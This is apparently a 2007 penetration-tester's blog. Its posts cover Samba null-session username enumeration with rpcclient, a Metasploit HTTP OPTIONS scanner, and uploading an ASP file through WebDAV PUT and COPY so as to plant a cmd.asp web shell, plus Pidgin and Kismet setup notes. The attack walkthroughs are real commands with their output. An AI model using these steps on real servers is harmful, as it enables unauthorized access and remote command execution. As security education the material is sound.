Wednesday, August 29, 2007

More of using rpcclient to find usernames


So say you are given the assignment of doing an audit in a non-english speaking country. you are at a minimum going to have to locate how they spell administrator in the country in question. if google doesnt help you or gives you multiple options (like it did me this time) if you can find a box running samba or with file and printer sharing enabled and shared to the world (like you arent supposed to do) then you can use rpcclient to pull out the usernames with a null session

null sessions still rule in 2007...

cg@segfault:~$ rpcclient -U "" x.x.3.96
Password:
rpcclient $> lsaenumsid
found 11 SIDs
S-1-5-6
S-1-5-32-551
S-1-5-32-547
S-1-5-32-545
S-1-5-32-544
S-1-5-21-2000478354-1708537768-1957994488-501 <--guest
S-1-5-21-2000478354-1708537768-1957994488-500 <--administrator
S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-1-0
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-501
S-1-5-21-2000478354-1708537768-1957994488-501 NSL09\Convidado (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)
rpcclient $> lookupnames Administrador
Administrador S-1-5-21-2000478354-1708537768-1957994488-500 (User: 1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-502
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-504
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-505
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-506
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-5-21-2000478354-1708537768-1957994488-1000 NSL09\TsInternetUser (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1001 NSL09\IUSR_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1002 NSL09\IWAM_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1003
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1004
result was NT_STATUS_NONE_MAPPED
rpcclient $> exit


There you have it:

rpcclient rpcclient $> lgt; lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)

oh and thanks for the name of the box too :-)


fun rpcclient info: http://uw714doc.sco.com/en/samba/rpcclient.1.html

-CG
CG

Nmap's ircServerInfo script


This summary is not available. Please click here to view the post.
dean de beer

Sunday, August 26, 2007

BackTrack2 is NOT an operating system!!!


ok over on EH.net there are a couple of running threads on installing backtrack to Hard Disk/Drive so people can use BackTrack2 as their Operation System.

here is one of them link; i dont feel like looking up the rest (really not the point) but this has been going on for some time now (really since BT1).

OK i am going to vent for just a sec but i do have a point...

BACKTRACK IS NOT AN OPERATING SYSTEM! it is a TOOL!!

yes obviously you can run it as an operating system (hence the whole point of the rant) but why do your NEED to do that?

frankly the best education comes from building your own attack platform on the linux distro you installed, configured, and hardened yourself. You install, configure and mess with the tools YOU need to do your pentesting (or scanning your local ISP subnet) and dont have a bunch of extra crap you dont need. You get to work through library issues and crap breaking and getting so pissed at your box that you want to dropkick it out the window but guess what, you LEARN doing all that.

one of the biggest things i see over at LSO and during the rootwars is people having weak linux skills and not being able to compile and use their own tools, so naturally we ask what distro the run and mos of the time i get backtrack for an answer :-(

Dont get me wrong, i like backtrack2 as a TOOL, i boot the ISO in VMware i do what i need to do then i go back to my linux distro to read email and everything else. I have a couple of personal reasons for that one of them being denialability with the non-persistent option :-) but mostly for the reasons above; if i am going to go thru the trouble of installing a distro I might as well get something out of the install (linux knowledge-wise) instead of letting someone else do all the work for me.

just my thoughts on it. spend that effort installing that great set of tools that backtrack comes with on your own, you'll learn more and really get an idea if you actually NEED all of those tools and you get satisfaction of having control over your linux install.

-CG
CG

Thursday, August 23, 2007

Should I be flattered or worried...


so I was playing on my linkedin account and checked the "who has viewed your profile" option. one category caught my eye. not sure if I should be flattered or worried that someone from the ministry of defense is taking a looksee...


CG

Sunday, August 19, 2007

Creating a HTTP OPTIONS auxiliary module for Metasploit


Inspired by HD's HTTP version auxiliary module i wanted to see if i could get one going that would be pull down the HTTP Verbs allowable on a web server.

Basically i wanted to do:

cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0


HTTP/1.1 200 OK

Connection: close

Date: Sun, 19 Aug 2007 05:18:55 GMT

Server: Microsoft-IIS/6.0

MicrosoftOfficeWebServer: 5.0_Pub

X-Powered-By: ASP.NET

Content-Length: 0

Accept-Ranges: bytes

DASL:

DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Cache-Control: private


cg@segfault:~/evil/msf3$

but with a metasploit auxiliary module. so i got it going... mostly HD's module but i changed what needed to be changed to get it to work.

cg@segfault:~/evil/msf3$ ./msfconsole

____________
<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >

i'll post the code on carnal0wnage when i get off my butt and a little something something that gives you a status if you are scanning a Class C.

**more on getting code on the box once you find a PUT

cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109

then you have to do a MOVE or COPY request. personally i was having issues getting a MOVE request to work with a netcat connection, so i used...

**UPDATE
it ended up being the carriage returns (or lack thereof) that was causing me to get a 400 Bad Request error. I couldnt get the MOVE command to work, but the COPY command did.

cadaver http://www.webdav.org/cadaver/

cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit

from there you will want to upload your cmd.asp so you can execute commands on the box.


Browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)



Interacting with out cmdx.aspx to list the directory contents of the C drive


-CG
CG

Sunday, August 12, 2007

Getting the SILC plugin to work with pidgin on ubuntu 7.04


maybe its common knowledge to everyone else, but since i couldnt find a good answer with google i'll post up how i got the silc plugin and googletalk to work with pidgin on ubuntu 7.04.

first ubuntu has some stupid ass permissions on alot of stuff and you have to use sudo for everything, i'm still undecided if ubuntu is staying around, but this can even cause you to be unable to read files and folders that you own (like i said stupid)

well when you start up pidgin as your user account everything works pretty good, except when you try to run your silc module. you'll probably get a "cant create silc key pair" error. googling wont do you much good, and you'll look where it tells you the key is /home/$userid/.silc/public_key.pub & private_key.prv and you wont have any keys there. Copying keys over from another silc client. wont work.

so the fix is to run pidgin as root so it will generate the keys for you.

cg@segfault:~$ sudo pidgin
Password:
Public key has been saved into `/root/.silc/public_key.pub'.
Private key has been saved into `/root/.silc/private_key.prv'
.


after that, copy those new spiffy keys from /root/ to your home directory

cg@segfault:~$ sudo su
root@segfault:/home/cg# cp /root/.silc/public_key.pub /home/cg/.silc/
root@segfault:/home/cg# cp /root/.silc/private_key.prv /home/cg/.silc/


things should work after that.

i also had issues with ssl support, google actually helped out this time and i found

http://developer.pidgin.im/wiki/FAQssl

you need to compile with the libgnutls package.


sudo apt-get install libgnutls-dev

then recompile from source

./configure --enable-gnutls

MSN and GoogleTalk should work after that.

CG

Wednesday, August 8, 2007

Playing with Kismet


A few people know i am recovering from my iBook dying.

of course like a jackass, i wasnt backing up properly which is kind of a bummer but sometimes its always nice to start fresh, but if any of you ever sent me an email i wanted to keep, can you please resend it :-)

anyway, the silver lining of all of this is i got a new lappy (Toshibia A135-S4727) with a built in atheros card so i can finally use that hacking exposed wireless book i borrowed from work (and wont be returning) and can play with some of the wireless hack tools. I'm running Ubuntu 7.04 so it was fairly easy to get things up an running. A couple quick apt-get's and a little editing of the kismet conf file and i was up and running.

$sudo apt-get install madwifi-tools
$sudo apt-get install kismet


after you install the madwifi tools you should see the wifi0 interface when you do an ifconfig

wifi0 Link encap:UNSPEC HWaddr 00-19-7E-8A-BB-F4-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1399800 errors:113005 dropped:98619 overruns:0 frame:1332679
TX packets:98112 errors:2 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:199
RX bytes:283152996 (270.0 MiB) TX bytes:12557358 (11.9 MiB)
Interrupt:16


change directories into /etc/kismet and edit the kismet.conf file to use the madwifi_ag drivers

source=madwifi_ag,wifi0,Atheros

after that you should be good to go:

$sudo kismet










Links

http://www.kismetwireless.net/


http://www.wi-fiplanet.com/tutorials/article.php/3595531
CG